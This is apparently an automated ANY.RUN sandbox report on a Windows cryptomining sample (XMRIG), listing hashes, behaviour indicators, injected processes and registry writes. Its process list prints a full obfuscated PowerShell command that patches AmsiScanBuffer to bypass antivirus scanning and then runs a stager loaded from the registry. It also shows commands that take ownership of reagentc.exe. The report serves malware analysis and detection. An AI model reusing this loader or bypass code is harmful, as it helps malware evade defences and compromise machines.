File name:

2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom

Full analysis: https://app.any.run/tasks/238325e0-83a9-45eb-8fa8-1a8702ed3842
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 21:41:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
auto-reg
evasion
antivm
miner
xmrig
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

E2940D084BEA169B4FC58B2223162543

SHA1:

4CE0F4D8E6A43922A85689314C9D3AD4C3C388B1

SHA256:

280F20449A91107B37008B7BEEF357BA33C2D8CFDB5F2E00024445352DB68B32

SSDEEP:

12288:t9ORO14XWWDAj4o5w2lcSY6oh+6NHj+lNaYHKXWVS9lRfLsKtQ:t9OROKwj4o5w2lqt+2aSqS3RfLsKt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5956)

    • Adds process to the Windows Defender exclusion list

      • WinTemp-v4.exe (PID: 4448)

    • Changes Windows Defender settings

      • WinTemp-v4.exe (PID: 4448)

    • Starts REAGENTC.EXE to disable the Windows Recovery Environment

      • ReAgentc.exe (PID: 4188)

    • Uses Task Scheduler to autorun other applications

      • WinTemp-v4.exe (PID: 4448)

    • Changes the autorun value in the registry

      • WinTemp-v4.exe (PID: 4448)

    • MINER has been detected (SURICATA)

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 1116)

    • Connects to the CnC server

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 1116)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2268)
      • powershell.exe (PID: 5256)

    • Runs injected code in another process

      • powershell.exe (PID: 2268)
      • vZWGdtOk.exe (PID: 1328)
      • powershell.exe (PID: 5256)

    • Application was injected by another process

      • winlogon.exe (PID: 6648)
      • svchost.exe (PID: 2292)
      • lsass.exe (PID: 756)
      • svchost.exe (PID: 1252)
      • svchost.exe (PID: 2536)
      • svchost.exe (PID: 1352)
      • svchost.exe (PID: 2196)
      • svchost.exe (PID: 1652)
      • spoolsv.exe (PID: 2732)
      • svchost.exe (PID: 2396)
      • svchost.exe (PID: 1784)
      • svchost.exe (PID: 1980)
      • svchost.exe (PID: 468)
      • svchost.exe (PID: 2584)
      • svchost.exe (PID: 1260)
      • svchost.exe (PID: 1892)
      • svchost.exe (PID: 2448)
      • svchost.exe (PID: 1792)
      • svchost.exe (PID: 2172)
      • svchost.exe (PID: 1904)
      • svchost.exe (PID: 1044)
      • svchost.exe (PID: 2624)
      • svchost.exe (PID: 1988)
      • svchost.exe (PID: 2544)
      • svchost.exe (PID: 1288)
      • svchost.exe (PID: 1416)
      • svchost.exe (PID: 1524)
      • svchost.exe (PID: 1552)
      • svchost.exe (PID: 1772)
      • svchost.exe (PID: 2068)
      • svchost.exe (PID: 1444)
      • svchost.exe (PID: 1232)
      • svchost.exe (PID: 3860)
      • svchost.exe (PID: 2112)
      • dasHost.exe (PID: 3012)
      • svchost.exe (PID: 3104)
      • RuntimeBroker.exe (PID: 6160)
      • svchost.exe (PID: 3216)
      • svchost.exe (PID: 4292)
      • svchost.exe (PID: 1684)
      • svchost.exe (PID: 3812)
      • svchost.exe (PID: 2932)
      • svchost.exe (PID: 2776)
      • OfficeClickToRun.exe (PID: 3112)
      • svchost.exe (PID: 3084)
      • svchost.exe (PID: 6024)
      • svchost.exe (PID: 3184)
      • svchost.exe (PID: 3196)
      • svchost.exe (PID: 2920)
      • RuntimeBroker.exe (PID: 5368)
      • MoUsoCoreWorker.exe (PID: 5496)
      • uhssvc.exe (PID: 648)
      • svchost.exe (PID: 4312)
      • svchost.exe (PID: 2880)
      • svchost.exe (PID: 1572)
      • svchost.exe (PID: 4544)
      • explorer.exe (PID: 5492)
      • svchost.exe (PID: 4508)
      • svchost.exe (PID: 3232)
      • sihost.exe (PID: 4984)
      • svchost.exe (PID: 2996)
      • svchost.exe (PID: 6608)
      • svchost.exe (PID: 4952)
      • svchost.exe (PID: 3564)
      • dwm.exe (PID: 6568)
      • svchost.exe (PID: 860)
      • WmiPrvSE.exe (PID: 1132)
      • svchost.exe (PID: 3284)

    • XMRIG has been detected (YARA)

      • cmd.exe (PID: 1116)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • WinTemp-v4.exe (PID: 4448)
      • svchost.exe (PID: 864)

    • Starts POWERSHELL.EXE for commands execution

      • WinTemp-v4.exe (PID: 4448)
      • cmd.exe (PID: 856)
      • cmd.exe (PID: 6620)

    • Script adds exclusion process to Windows Defender

      • WinTemp-v4.exe (PID: 4448)

    • Executes application which crashes

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • Win-v42.exe (PID: 6576)
      • Win-v43.exe (PID: 5960)
      • Win-v41.exe (PID: 6660)
      • Win-v41.exe (PID: 5124)

    • The process creates files with name similar to system file names

      • WerFault.exe (PID: 2244)

    • There is functionality for VM detection VirtualBox (YARA)

      • WinTemp-v4.exe (PID: 4448)

    • There is functionality for VM detection VMWare (YARA)

      • WinTemp-v4.exe (PID: 4448)

    • Script adds exclusion path to Windows Defender

      • WinTemp-v4.exe (PID: 4448)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 2340)
      • cmd.exe (PID: 5360)

    • Starts CMD.EXE for commands execution

      • WinTemp-v4.exe (PID: 4448)

    • Reads security settings of Internet Explorer

      • WinTemp-v4.exe (PID: 4448)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • WinTemp-v4.exe (PID: 4448)

    • Connects to unusual port

      • WinTemp-v4.exe (PID: 4448)
      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 1116)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 856)
      • cmd.exe (PID: 6620)

    • Potential Corporate Privacy Violation

      • cmd.exe (PID: 5416)
      • cmd.exe (PID: 1116)

    • Executes as Windows Service

      • cmd.exe (PID: 856)
      • cmd.exe (PID: 6620)

    • Uses powercfg.exe to modify the power settings

      • WinTemp-v4.exe (PID: 4448)

    • Hides command output

      • cmd.exe (PID: 5064)

    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 1184)

    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 2268)
      • powershell.exe (PID: 5256)

  • INFO

    • Checks supported languages

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • WinTemp-v4.exe (PID: 4448)
      • Win-v43.exe (PID: 5960)
      • Win-v42.exe (PID: 6576)
      • Win-v41.exe (PID: 6660)
      • vZWGdtOk.exe (PID: 1328)
      • uhssvc.exe (PID: 648)
      • Win-v41.exe (PID: 5124)

    • Create files in a temporary directory

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • WinTemp-v4.exe (PID: 4448)
      • svchost.exe (PID: 864)

    • Reads the computer name

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • WinTemp-v4.exe (PID: 4448)
      • vZWGdtOk.exe (PID: 1328)

    • Checks transactions between databases Windows and Oracle

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)

    • Reads the machine GUID from the registry

      • 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe (PID: 5640)
      • WinTemp-v4.exe (PID: 4448)

    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 5956)
      • winlogon.exe (PID: 6648)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5544)
      • powershell.exe (PID: 4988)
      • powershell.exe (PID: 1276)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 1276)
      • powershell.exe (PID: 4988)
      • powershell.exe (PID: 5544)

    • Auto-launch of the file from Registry key

      • WinTemp-v4.exe (PID: 4448)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2244)
      • WerFault.exe (PID: 4920)
      • WerFault.exe (PID: 4300)
      • WinTemp-v4.exe (PID: 4448)

    • Manual execution by a user

      • Win-v42.exe (PID: 6576)
      • Win-v43.exe (PID: 5960)

    • Reads the software policy settings

      • WinTemp-v4.exe (PID: 4448)
      • slui.exe (PID: 6108)

    • Creates or changes the value of an item property via Powershell

      • cmd.exe (PID: 856)

    • Checks proxy server information

      • WinTemp-v4.exe (PID: 4448)
      • slui.exe (PID: 6108)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2268)
      • powershell.exe (PID: 5256)

    • Reads Microsoft Office registry keys

      • OfficeClickToRun.exe (PID: 3112)

    • Creates files in the program directory

      • MoUsoCoreWorker.exe (PID: 5496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:12 11:41:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 286208
InitializedDataSize: 127488
UninitializedDataSize: -
EntryPoint: 0x1e600
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
192
Monitored processes
130
Malicious processes
12
Suspicious processes
69

Behavior graph

Click at the process to see the details
start 2025-05-15_e2940d084bea169b4fc58b2223162543_black-basta_cobalt-strike_satacom.exe CMSTPLUA wintemp-v4.exe powershell.exe no specs conhost.exe no specs werfault.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reagentc.exe no specs win-v42.exe win-v43.exe werfault.exe no specs werfault.exe no specs cmd.exe no specs conhost.exe no specs takeown.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs #MINER cmd.exe svchost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs win-v41.exe no specs werfault.exe no specs svchost.exe vzwgdtok.exe no specs slui.exe #MINER cmd.exe svchost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs win-v41.exe no specs werfault.exe no specs svchost.exe uhssvc.exe lsass.exe svchost.exe svchost.exe wmiprvse.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe dashost.exe svchost.exe svchost.exe officeclicktorun.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe sihost.exe runtimebroker.exe explorer.exe mousocoreworker.exe svchost.exe runtimebroker.exe dwm.exe svchost.exe winlogon.exe

Process information

PID
CMD
Path
Indicators
Parent process
468C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSMC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\lsm.dll
c:\windows\system32\msvcrt.dll
536powercfg /change hibernate-timeout-ac 0C:\Windows\System32\powercfg.exeWinTemp-v4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\sechost.dll
648"C:\Program Files\Microsoft Update Health Tools\uhssvc.exe"C:\Program Files\Microsoft Update Health Tools\uhssvc.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Update Health Service
Version:
10.0.19041.3626 (WinBuild.160101.0800)
Modules
Images
c:\program files\microsoft update health tools\uhssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
756C:\WINDOWS\system32\lsass.exeC:\Windows\System32\lsass.exe
wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Local Security Authority Process
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\lsass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lsasrv.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
780ping -n 1 -w 1000 8.8.8.8 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
856cmd.exe /c "powershell.exe -Command ""function Local:gRqciZmRDNZz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rhAfohFPrzdmkr,[Parameter(Position=1)][Type]$hGSBylOHiw)$cTpMZgtemoV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+'e'+'g'+'a'+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+'e'+'al'+'e'+''+'d'+',A'+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$cTpMZgtemoV.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+[Char](72)+''+'i'+'d'+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$rhAfohFPrzdmkr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+','+'M'+'a'+''+'n'+''+[Char](97)+'ge'+'d'+'');$cTpMZgtemoV.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'bl'+'i'+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$hGSBylOHiw,$rhAfohFPrzdmkr).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $cTpMZgtemoV.CreateType();}$VqgHuwLTMhAyg=([AppDomain]::CurrentDomain.GetAssemblies()^|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+'o'+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$hahApUNtkFNcyR=$VqgHuwLTMhAyg.GetMethod('Ge'+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+'d'+'r'+'ess',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cowknaJgyCenkMBgLxV=gRqciZmRDNZz @([String])([IntPtr]);$yxMTmkmdNdJsXLfhXPDVRe=gRqciZmRDNZz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eJXkUTdoNPl=$VqgHuwLTMhAyg.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'ndl'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+'l'+'l')));$qGmoIDKDRixBOZ=$hahApUNtkFNcyR.Invoke($Null,@([Object]$eJXkUTdoNPl,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$ycbGpckzkDFUiIaqz=$hahApUNtkFNcyR.Invoke($Null,@([Object]$eJXkUTdoNPl,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$sURhtCY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qGmoIDKDRixBOZ,$cowknaJgyCenkMBgLxV).Invoke('am'+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$tFLyWgaBnlqxwLfPQ=$hahApUNtkFNcyR.Invoke($Null,@([Object]$sURhtCY,[Object]('A'+[Char](109)+'si'+[Char](83)+'c'+'a'+'n'+[Char](66)+''+'u'+'f'+[Char](102)+''+'e'+'r')));$YEzXUqVSFk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ycbGpckzkDFUiIaqz,$yxMTmkmdNdJsXLfhXPDVRe).Invoke($tFLyWgaBnlqxwLfPQ,[uint32]8,4,[ref]$YEzXUqVSFk);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](43+88),[Byte](229+6),[Byte](215-215),[Byte](97+87),[Byte](169-82),[Byte](8-8),[Byte](207-200),[Byte](210-82),[Byte](252-121),[Byte](28+165),[Byte](169-169),[Byte](239-44),[Byte](174-43),[Byte](106+129),[Byte](214-214)),0,$tFLyWgaBnlqxwLfPQ,211-196);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ycbGpckzkDFUiIaqz,$yxMTmkmdNdJsXLfhXPDVRe).Invoke($tFLyWgaBnlqxwLfPQ,[uint32]8,0x20,[ref]$YEzXUqVSFk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue('f7f81a39-5f63-5b42-9efd-1f13b5431005#39;+'S'+''+[Char](72)+'st'+'a'+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"""C:\Windows\System32\cmd.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
860C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvcC:\Windows\System32\svchost.exe
services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
864takeown /F "C:\WINDOWS\System32\reagentc.exe"C:\Windows\System32\takeown.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Takes ownership of a file
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\takeown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
864C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
WinTemp-v4.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
872\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
47 654
Read events
47 354
Write events
157
Delete events
143

Modification events

(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconLayouts
Value:
00000000000000000000000000000000030001000100010013000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000000D0000000000000053006B007900700065002E006C006E006B003E0020007C000000160000000000000061006300740069007600690074006900650073006A0075006D0070002E007200740066003E00200020000000100000000000000062006500640069006E007000750074002E007200740066003E0020002000000015000000000000006200750069006C00640069006E0067006D006F006E00650079002E0070006E0067003E0020002000000014000000000000006300680069006500660074007500650073006400610079002E0070006E0067003E002000200000000F000000000000006C006500650065006400670065002E007200740066003E00200020000000130000000000000070006500740065007200630061006E006300650072002E007200740066003E0020002000000016000000000000007000750062006C00690063006100740069006F006E006800690073002E006A00700067003E0020002000000015000000000000007300650063006F006E0064006300680069006300610067006F002E007200740066003E002000200000001500000000000000730065007200760065007200660075006E00640069006E0067002E0070006E0067003E00200020000000150000000000000075007300750061006C006C00790065006E00670069006E0065002E007200740066003E00200020000000550000000000000032003000320035002D00300035002D00310035005F00650032003900340030006400300038003400620065006100310036003900620034006600630035003800620032003200320033003100360032003500340033005F0062006C00610063006B002D00620061007300740061005F0063006F00620061006C0074002D0073007400720069006B0065005F00730061007400610063006F006D002E006500780065003E00200020000000010000000000000002000100000000000000000001000000000000000200010000000000000000001100000006000000010000001300000000000000000000000000000000000000803F0000004008000000803F0000404009000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E0000000040000040400F0000000040000080401000000000400000A0401100000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F070000004040000000001200
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconNameVersion
Value:
1
(PID) Process:(5492) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:writeName:LastUpdate
Value:
AC5F266800000000
(PID) Process:(2996) svchost.exeKey:HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
Operation:writeName:C:\Users\admin\AppData\Local\Temp\WinTemp-v4.exe
Value:
5341435001000000000000000700000028000000003806000000000001000000000000000000000A7322000050BB64EDDDACD5010000000000000000
(PID) Process:(1352) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileService\References\S-1-5-21-1693682860-607145093-2874071422-1001
Operation:writeName:RefCount
Value:
07000000
(PID) Process:(5956) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(3284) svchost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\FTH
Operation:writeName:CheckPointTime
Value:
223196982
